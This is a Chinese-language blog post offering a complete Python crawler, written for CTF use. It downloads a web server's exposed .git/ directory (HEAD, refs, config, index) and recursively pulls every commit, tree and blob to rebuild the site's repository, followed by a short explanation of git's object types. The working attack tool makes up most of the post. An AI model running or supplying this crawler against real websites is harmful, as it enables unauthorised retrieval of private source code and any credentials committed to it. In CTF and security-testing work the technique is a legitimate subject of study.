guest@blog.cmj.tw: ~/posts $

Git Crawler


Step-by-step with your own requirement

因為之前為了打 CTF 而寫的一個簡單的 .git 爬蟲:當網站開放使用 .git/ 路徑的時候,可以根據一定的規律將整個 repository 抓下來。

#! /usr/bin/env python
# Copyright (c) 2015-2015 cmj<cmj@cmj.tw>. All right reserved.

class Git(object):
    '''Simple crawler for an exposed .git repository.

    When a web server serves its .git/ directory, the well-known entry
    points (HEAD, ORIG_HEAD, FETCH_HEAD, config, remote refs) reveal
    commit hashes; from those the whole object graph can be walked and
    mirrored into a local directory.
    '''

    def __init__(self, url, storage='cmj/.git'):
        '''Prepare local storage and crawl every standard .git entry point.

        url     -- base URL of the site exposing a /.git/ directory
        storage -- local directory mirroring the remote .git layout
        '''
        import os

        self._url_ = url
        self.storage = storage

        # create the storage directory and all its ancestors in one call
        # (the old per-component loop skipped the last component)
        os.makedirs(storage, exist_ok=True)

        self.HEAD()
        self.ORIG_HEAD()
        self.FETCH_HEAD()
        self.config()
        self.remote()

    def __call__(self, seed):
        '''Download .git/<seed>; return the raw bytes, or None on HTTP error.'''
        import urllib.request
        import urllib.error

        try:
            rsp = urllib.request.urlopen('{0}/.git/{1}'.format(self._url_, seed))
        except urllib.error.HTTPError:
            return None
        with rsp:
            return rsp.read()

    def __setitem__(self, path, value):
        '''Store `value` at <storage>/<path>, creating intermediate dirs.

        A falsy value (e.g. None from a failed download) is silently
        ignored so callers can assign unchecked download results.
        '''
        import os

        if not value:
            return
        parts = path.split('/')
        # i == 0 creates <storage> itself, then each intermediate directory
        for i in range(len(parts)):
            sub = '{0}/{1}'.format(self.storage, '/'.join(parts[:i]))
            if not os.path.isdir(sub):
                os.mkdir(sub)
        dest = '{0}/{1}'.format(self.storage, '/'.join(parts))
        with open(dest, 'wb') as fd:
            fd.write(value)

    def commit(self, seed):
        '''Fetch the object named by SHA-1 `seed`, store it, and recurse.

        commit objects are followed through their `tree`/`parent` header
        lines, tree objects through every entry they list; blobs are
        terminal.  Objects already present locally are skipped.
        '''
        import os
        import zlib

        if isinstance(seed, bytes):
            seed = seed.decode()
        seed = seed.strip()
        seed = 'objects/{0}/{1}'.format(seed[:2], seed[2:])

        # already mirrored -> nothing to do; check under the storage root,
        # not the current working directory (the old check never matched)
        if os.path.isfile('{0}/{1}'.format(self.storage, seed)):
            return
        data = self(seed)
        if not data:
            return
        self[seed] = data

        # loose objects are zlib streams: b'<type> <size>\x00<payload>'
        raw = zlib.decompress(data)
        space, nul = raw.index(b' '), raw.index(b'\x00')
        fmt = raw[:space].decode()
        size = int(raw[space:nul])
        raw = raw[nul + 1:nul + 1 + size]

        if fmt == 'commit':
            # header lines 'tree <sha>' / 'parent <sha>' reference further
            # objects; matching by keyword also survives root commits
            # (no parent) and merges (several parents)
            for line in raw.split(b'\n'):
                token = line.split()
                if token and token[0] in (b'tree', b'parent'):
                    self.commit(token[1])
        elif fmt == 'tree':
            # entries: b'<mode> <name>\x00' followed by a 20-byte raw SHA-1
            while raw:
                pos = raw.index(b'\x00') + 1
                self.commit(raw[pos:pos + 20].hex())
                raw = raw[pos + 20:]
        elif fmt == 'blob':
            pass    # leaf node: plain file content, nothing to follow
        else:
            raise NotImplementedError(fmt)

    def HEAD(self):
        '''Load .git/HEAD and crawl the branch it points at.'''
        data = self('HEAD')
        if not data:
            # no readable HEAD means the host does not expose .git at all
            # (the old message referenced an undefined name `url`)
            raise SystemError('{0} does not expose a readable .git'.format(self._url_))
        print('Load .git/HEAD ...')
        self['HEAD'] = data

        # HEAD is usually b'ref: refs/heads/<branch>'; the last word is the ref
        refs = data.split()[-1].decode()
        seed = self(refs)
        self[refs] = seed
        if seed:
            self.commit(seed)

    def ORIG_HEAD(self):
        '''Load .git/ORIG_HEAD (if present) and its commit.'''
        print('Load .git/ORIG_HEAD ...')
        data = self('ORIG_HEAD')
        self['ORIG_HEAD'] = data
        if data:    # ORIG_HEAD is frequently absent; don't crash on None
            self.commit(data)

    def FETCH_HEAD(self):
        '''Load .git/FETCH_HEAD (if present) and every commit it lists.'''
        print('Load .git/FETCH_HEAD ...')
        data = self('FETCH_HEAD')
        self['FETCH_HEAD'] = data
        if data:
            # each non-empty line starts with a commit hash
            for line in data.split(b'\n'):
                if line:
                    self.commit(line.split()[0])

    def config(self):
        '''Load .git/config and .git/index verbatim.'''
        print('Load .git/config ...')
        self['config'] = self('config')
        self['index'] = self('index')

    def remote(self):
        '''Load .git/refs/remotes/origin/HEAD and crawl the commit it names.'''
        print('Load .git/refs/remotes/origin/HEAD ...')
        data = self('refs/remotes/origin/HEAD')
        self['refs/remotes/origin/HEAD'] = data
        if not data:
            return

        # b'ref: refs/remotes/origin/<branch>' -> fetch the named ref, then
        # crawl the hash it contains (the old code passed the ref *path*
        # to commit(), unlike HEAD() which correctly passed the content)
        refs = data.split()[1].decode()
        seed = self(refs)
        self[refs] = seed
        if seed:
            self.commit(seed)

這個爬蟲的原理是:利用 .git/ 中一定存在的幾個檔案,來判斷有哪些 commit。像是可以從 .git/HEAD 當中可以了解目前 focus 在哪一個 branch (e.g. refs/heads/master),接下來就可以順著這個 commit tree 來撈取相關的 commits。

需要了解的是,.git 中的每一個物件都屬於 commit / tree / blob 三種型態之一。commit 代表著這筆 commit 會跟哪些 commit(以及哪個 tree)有關係,而 tree 則表示這個節點可能包含著其他的節點,這裡的節點可能是 tree 或者是 blob,而 blob 則表示真實儲存的資料。